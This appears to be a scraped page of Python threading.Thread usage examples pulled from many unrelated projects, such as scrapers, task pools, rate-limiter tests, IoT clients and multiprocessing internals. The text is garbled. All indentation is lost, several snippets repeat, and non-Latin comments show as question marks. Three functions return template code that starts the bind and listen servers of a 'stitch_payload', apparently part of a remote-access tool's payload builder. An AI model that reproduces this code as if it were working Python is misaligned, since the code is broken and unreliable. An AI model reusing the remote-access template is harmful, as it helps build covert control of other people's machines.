def getDetailList(self,content):
s2 = r'<h2><a target="_blank" href="(.*?)" title="(.*?)"'
pattern =re.compile(s2 , re.S
)
result = re.findall(pattern, content)
with open('file.txt','w',encoding='gbk') as f:
f.write(content)
if not result:
print('???????..............')
threadsList=[]
for item in result:
t = threading.Thread(target = workthread, args=(item, self.user_agent, self.path))
threadsList.append(t)
t.start()
for threadid in threadsList:
threadid.join()
python类Thread()的实例源码
def async_task(self, target, *args, **kwargs):
"""Must be used with 'yield', as
'val = yield pool.async_task(target, args, kwargs)'.
@task is task where this method is called.
@target is function/method that will be executed asynchronously in a
thread.
@args and @kwargs are arguments and keyword arguments passed to @target.
This call effectively returns result of executing
'target(*args, **kwargs)'.
"""
if not self._scheduler:
self._scheduler = Pycos.scheduler()
task = Pycos.cur_task(self._scheduler)
# assert isinstance(task, Task)
# if arguments are passed as per Thread call, get args and kwargs
if not args and kwargs:
args = kwargs.pop('args', ())
kwargs = kwargs.pop('kwargs', kwargs)
task._await_()
self._task_queue.put((task, target, args, kwargs))
def async_task(self, target, *args, **kwargs):
"""Must be used with 'yield', as
'val = yield pool.async_task(target, args, kwargs)'.
@task is task where this method is called.
@target is function/method that will be executed asynchronously in a
thread.
@args and @kwargs are arguments and keyword arguments passed to @target.
This call effectively returns result of executing
'target(*args, **kwargs)'.
"""
if not self._scheduler:
self._scheduler = Pycos.scheduler()
task = Pycos.cur_task(self._scheduler)
# assert isinstance(task, Task)
# if arguments are passed as per Thread call, get args and kwargs
if not args and kwargs:
args = kwargs.pop('args', ())
kwargs = kwargs.pop('kwargs', kwargs)
task._await_()
self._task_queue.put((task, target, args, kwargs))
def add_listen_bind_main():
return'''
def main():
if not stitch_running():
st_pyld = stitch_payload()
try:
bind = threading.Thread(target=st_pyld.bind_server, args=())
listen = threading.Thread(target=st_pyld.listen_server, args=())
bind.daemon = True
listen.daemon = True
bind.start()
listen.start()
while True:
sleep(60)
except KeyboardInterrupt:
pass
except Exception as e:
if dbg:
print e
pass
st_pyld.halt_bind_server()
st_pyld.halt_listen_server()
'''
def add_listen_main():
return '''
def main():
if not stitch_running():
st_pyld = stitch_payload()
try:
listen = threading.Thread(target=st_pyld.listen_server, args=())
listen.daemon = True
listen.start()
while True:
sleep(60)
except KeyboardInterrupt:
pass
except Exception as e:
if dbg:
print e
pass
st_pyld.halt_listen_server()
'''
def add_bind_main():
return '''
def main():
if not stitch_running():
st_pyld = stitch_payload()
try:
bind = threading.Thread(target=st_pyld.bind_server, args=())
bind.daemon = True
bind.start()
while True:
sleep(60)
except KeyboardInterrupt:
pass
except Exception as e:
if dbg:
print e
pass
st_pyld.halt_bind_server()
'''
def __init__(self, srv_obj, path, password=None, client_id=None, disable_auto_login=True):
"""Toxxmlrpc_Server:
srv_obj: Python Object to Serve
path: Settingsfolder
password: You need a password for auto connecting Clients
client_id: Server connects to one pre defined Client,
Nessessary if you want to build a Monitoring solution f.e.
If None: Client connects to Server like normal
"""
threading.Thread.__init__(self)
if disable_auto_login:
self.client = toxclient.Toxclient(path)
else:
self.client = toxclient.Toxclient(path,password)
self.password = password
self.client_id = client_id
self.srv_obj = srv_obj
def StartFileServer(fileServerDir):
"""
Start file server.
"""
if not fileServerDir:
message = \
"The PYUPDATER_FILESERVER_DIR environment variable is not set."
if hasattr(sys, "frozen"):
logger.error(message)
return None
else:
fileServerDir = os.path.join(os.getcwd(), 'pyu-data', 'deploy')
message += "\n\tSetting fileServerDir to: %s\n" % fileServerDir
logger.warning(message)
fileServerPort = GetEphemeralPort()
thread = threading.Thread(target=RunFileServer,
args=(fileServerDir, fileServerPort))
thread.start()
WaitForFileServerToStart(fileServerPort)
return fileServerPort
def main():
# parser = argparse.ArgumentParser(
# description='Run the spoonybard server.')
# parser.add_argument('-c', help='Configuration file path')
# args = parser.parse_args()
# start ssh server
ssh_server = ssh.SSHServer(("localhost", 8022))
ssh_server_thread = threading.Thread(target=ssh_server.serve_forever)
ssh_server_thread.start()
def getDetailList(self,content):
s2 = r'<h2><a target="_blank" href="(.*?)" title="(.*?)"'
pattern =re.compile(s2 , re.S
)
result = re.findall(pattern, content)
with open('file.txt','w',encoding='gbk') as f:
f.write(content)
if not result:
print('???????..............')
threadsList=[]
for item in result:
t = threading.Thread(target = workthread, args=(item, self.user_agent, self.path))
threadsList.append(t)
t.start()
for threadid in threadsList:
threadid.join()
def _reader(self, name, stream, outbuf):
"""
Thread runner for reading lines of from a subprocess into a buffer.
:param name: The logical name of the stream (used for logging only).
:param stream: The stream to read from. This will typically a pipe
connected to the output stream of a subprocess.
:param outbuf: The list to append the read lines to.
"""
while True:
s = stream.readline()
if not s:
break
s = s.decode('utf-8').rstrip()
outbuf.append(s)
logger.debug('%s: %s' % (name, s))
stream.close()
def run_in_thread(fn):
"""
Decorator to run a function in a thread.
>>> 1 + 1
2
>>> @run_in_thread
... def threaded_sleep(seconds):
... from time import sleep
... sleep(seconds)
>>> thread = threaded_sleep(0.1)
>>> type(thread)
<class 'threading.Thread'>
>>> thread.is_alive()
True
>>> thread.join()
>>> thread.is_alive()
False
"""
def run(*k, **kw):
t = threading.Thread(target=fn, args=k, kwargs=kw)
t.start()
return t
return run
def start(self):
# start collector
self.con_collector.start()
self.hosts_collector.start()
logger.info("Monitor Collector has been started.")
# worker change it state itself. Independedntly from master.
self.etcd.setkey("machines/runnodes/"+self.addr, "work")
publicIP = env.getenv("PUBLIC_IP")
self.etcd.setkey("machines/publicIP/"+self.addr,publicIP)
self.thread_sendheartbeat = threading.Thread(target=self.sendheartbeat)
self.thread_sendheartbeat.start()
# start serving for rpc
logger.info ("begins to work")
self.rpcserver.serve_forever()
# send heardbeat package to keep alive in etcd, ttl=2s
def start(self):
self.deviceHandler.start()
if self.protocol == "udp":
self.loadState()
self.logger.debug("udpHeartbeatSeconds = {0}".format(self.udpHeartbeatSeconds))
self.logger.debug("udpDataPacketInterval = {0}".format(self.udpDataPacketInterval))
self.udpServer = SocketServer.UDPServer(('0.0.0.0', 0), IotUDPHandler)
self.udpServer.service = self
self.udpServer.role = IotUDPHandler.CLIENT
self.logger.info("starting UDP client at {0}:{1} connecting to {2}, state at {3}".format(self.udpServer.server_address[0], self.udpServer.server_address[1], self.serverAddr, self.stateFile))
timer = threading.Timer(0.5, self.repeat)
timer.daemon = True
timer.start()
self.udpServer.serve_forever()
elif self.protocol == "ssl":
while True:
self.logger.info("Connecting by SSL to server at {0}".format(self.serverAddr))
try:
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.logger.debug("using caCertFile={0}, deviceCertFile={1}, deviceKeyFile={2}".format(self.caCertFile, self.deviceCertFile, self.deviceKeyFile))
sslSocket = ssl.wrap_socket(sock, ca_certs=self.caCertFile, cert_reqs=ssl.CERT_REQUIRED, certfile=self.deviceCertFile, keyfile=self.deviceKeyFile, ssl_version=ssl.PROTOCOL_TLSv1)
sslSocket.connect((self.serverAddr.split(':')[0], int(self.serverAddr.split(':')[1])))
servercert = sslSocket.getpeercert()
subject = dict(x[0] for x in servercert['subject'])
self.logger.info("Connected to server with valid certificate, CN={0}".format(subject['commonName']))
self.sslSocket = sslSocket
sslThread = threading.Thread(target = self.sslListen, args = (self.sslSocket,))
sslThread.daemon = True
sslThread.start()
while True:
payload = self.deviceHandler.getMessagePayload()
self.logger.debug("Sending payload to {0} by SSL: {1}".format(self.serverAddr, payload))
iotcommon.sendMessage(self.sslSocket, payload)
time.sleep(self.sslIntervalSeconds)
except Exception as e:
self.logger.exception(e)
time.sleep(10)
def displaySensor1(self,number, description, trend):
self.canvas.itemconfigure(self.txtSensor1, text="{0:.1f}".format(number)+u'\u2103')
self.sensor1ts = datetime.datetime.now()
color = self.mapColor(number)
if description is not None:
self.canvas.itemconfigure(self.txtSensor1Desc, text=description)
self.canvas.itemconfigure(self.txtSensor1, fill=color)
self.canvas.itemconfigure(self.txtSensor1BigIcon, fill=color)
self.canvas.itemconfigure(self.txtSensor1SmallIcon, text=u'\u2022')
def hide():
time.sleep(0.5)
self.canvas.itemconfigure(self.txtSensor1SmallIcon, text="")
threading.Thread(target = hide).start()
if trend == -1:
self.canvas.itemconfigure(self.txtSensor1BigIcon, text=u'\u2198')
elif trend == 1:
self.canvas.itemconfigure(self.txtSensor1BigIcon, text=u'\u2197')
else:
self.canvas.itemconfigure(self.txtSensor1BigIcon, text="")
def _reader(self, name, stream, outbuf):
"""
Thread runner for reading lines of from a subprocess into a buffer.
:param name: The logical name of the stream (used for logging only).
:param stream: The stream to read from. This will typically a pipe
connected to the output stream of a subprocess.
:param outbuf: The list to append the read lines to.
"""
while True:
s = stream.readline()
if not s:
break
s = s.decode('utf-8').rstrip()
outbuf.append(s)
logger.debug('%s: %s' % (name, s))
stream.close()
def __init__(self, parent):
self.parent = parent
# Initialize variables for input data processing
self.data_queue = Queue.Queue()
self.empty_queue = False
# variables for thread management
self.is_running = True
self.timeout_check_period = 0.1 # this is in seconds
self.process_thread_released = False
# create mutex locks for handling issues with Reset
self.reset_lock = threading.Lock()
self.reset_signal = threading.Event()
# create and start the main thread
self.process_thread = threading.Thread(target=self.Process)
self.process_thread.start()
def callOmniorbpyWithTimeout(method, queue, pollPeriodSeconds = 0.001, timeoutSeconds = 1):
"""
Some omniorbpy methods have been found to hang if the system runs out of
threads. Call method and wait for up to timeoutSeconds. If the method
returns within timeoutSeconds, return the value placed on the queue;
otherwise, return None.
"""
thread = threading.Thread(target = method)
try:
thread.start()
except:
# If the system is out of threads, the thread.start() method can
# potentially fail.
return None
return _pollQueue(queue,
pollPeriodSeconds = pollPeriodSeconds,
timeoutSeconds = timeoutSeconds)
def test_multi_thread_blocking(self):
"""In a multithreaded environment, the requests should still be blocked
if exceding the quota."""
limiter = RateLimiter(3, 0.5)
def thread_target():
with limiter:
limiter.add_request()
threads = [threading.Thread(target=thread_target) for _ in range(4)]
start_time = time.time()
for thread in threads:
thread.start()
for thread in threads:
thread.join()
stop_time = time.time()
self.assertGreaterEqual(stop_time - start_time, 0.5)
def test_multi_thread_non_blocking(self):
"""If the rate limit is not exceded, check if the requests are not
blocked."""
limiter = RateLimiter(4, 1)
def thread_target():
with limiter:
limiter.add_request()
threads = [threading.Thread(target=thread_target) for _ in range(4)]
start_time = time.time()
for thread in threads:
thread.start()
for thread in threads:
thread.join()
stop_time = time.time()
self.assertLess(stop_time - start_time, 1)
def test_multi_thread(self):
"""Try to send requests in a multi-threaded context."""
client = LocalRiotAPIHandler("some random token",
limits=[RateLimiter(2, 0.5)])
client.server_address = "%s:%s" % self.server_address
def run():
client.get_match(4242)
threads = [threading.Thread(target=run) for _ in range(2)]
start = time.time()
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertLess(time.time() - start, 0.5)
def test_too_much_multi_thread(self):
"""Try to send too many requests in a multi-threaded context."""
client = LocalRiotAPIHandler("some random token",
limits=[RateLimiter(2, 0.5)])
client.server_address = "%s:%s" % self.server_address
def run():
client.get_match(4242)
threads = [threading.Thread(target=run) for _ in range(3)]
start = time.time()
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertGreaterEqual(time.time() - start, 0.5)
def show(self, link, path, on_load=None):
"""
:type link: str;
:param link: ?????? ????????;
:type path: str;
:param path: ???? ? ?????????? ??? ?????????? ???????????? ????????;
:type on_load: function;
:param on_load: ???????, ?????????? ????? ????????? ???????? ????????;
"""
if callable(self.dismiss_callback):
self.body.bind(on_dismiss=self.dismiss_callback)
if callable(on_load):
self._on_load = on_load
self.body.open()
thread = \
threading.Thread(target=self.retrieve_callback,
args=(link, path, self._tick_callback,
self._on_load,))
thread.start()
def new_build_thread(try_build):
import threading
for sub_pkg in list(try_build):
dumb_mutex = threading.Lock()
dumb_mutex.acquire()
try:
sub_thread = threading.Thread(
target=slave_thread_build, args=[sub_pkg])
sub_thread.start()
sub_thread.join()
dumb_mutex.release()
return 0
except:
err_msg(
'Sub-build process using thread {}, building \033[36m{}\033[0m \033[93mfailed!\033[0m'.format(sub_thread.name, sub_pkg))
return 128
def _set_updates_thread(self, running):
"""Sets the updates thread status (running or not)"""
if running == self._updates_thread_running.is_set():
return
# Different state, update the saved value and behave as required
self._logger.debug('Changing updates thread running status to %s', running)
if running:
self._updates_thread_running.set()
if not self._updates_thread:
self._updates_thread = Thread(
name='UpdatesThread', daemon=True,
target=self._updates_thread_method)
self._updates_thread.start()
else:
self._updates_thread_running.clear()
if self._updates_thread_receiving.is_set():
self._sender.cancel_receive()
def run_tests(self, case_list, threadNum):
global result
# ??filename???????
# ????
divide = self.divide_case(len(case_list), threadNum)
total_case = [case_list[i:i+divide] for i in range(0, len(case_list), divide)]
# ??Operator???
obj = run()
# ??case_list???case
threads = []
for i in range(len(total_case)):
threads.append(Thread(target=obj.run_case, args=(total_case[i], "thread_{}".format(i), result)))
for t in threads:
t.start()
for t in threads:
t.join()
return self.deal_with_result(result)
def multiple_run(self, rd_list, threadNum):
# ??filename???????
case_list = []
for rd in rd_list:
case_list.extend(rd.get_case_list())
# ????
divide = self.divide_case(len(case_list), threadNum)
total_case = [case_list[i:i+divide] for i in range(0, len(case_list), divide)]
# ??Operator???
obj = run()
# ??case_list???case
threads = []
for i in range(len(total_case)):
threads.append(Thread(target=obj.run_case, args=(total_case[i], "thread_{}".format(i), result)))
for t in threads:
t.start()
for t in threads:
t.join()
return self.deal_with_result(result)
def serve_forever(self):
'''
Run the server forever
'''
current_process()._manager_server = self
try:
try:
while 1:
try:
c = self.listener.accept()
except (OSError, IOError):
continue
t = threading.Thread(target=self.handle_request, args=(c,))
t.daemon = True
t.start()
except (KeyboardInterrupt, SystemExit):
pass
finally:
self.stop = 999
self.listener.close()
def _get_listener():
global _listener
if _listener is None:
_lock.acquire()
try:
if _listener is None:
debug('starting listener and thread for sending handles')
_listener = Listener(authkey=current_process().authkey)
t = threading.Thread(target=_serve)
t.daemon = True
t.start()
finally:
_lock.release()
return _listener
def data_loading(minibatch_size, data_iterator, shapeInput, exit_size):
queue_train = Queue(maxsize=exit_size*10)
queue_test = Queue(maxsize=exit_size*10)
def start_loading():
for e in range(exit_size):
iterator_train = data_iterator(shapeInput, minibatch_size, shuffle=True, train=True)
iterator_test = data_iterator(shapeInput, minibatch_size, shuffle=True, train=False)
for new_input in iterator_train:
while queue_train.full():
print('Queue full')
time.sleep(30)
queue_train.put(new_input)
new_input_test = iterator_test.next()
queue_test.put(new_input_test)
print('Exiting queue')
t = threading.Thread(target=start_loading)
t.daemon = True
t.start()
return queue_train, queue_test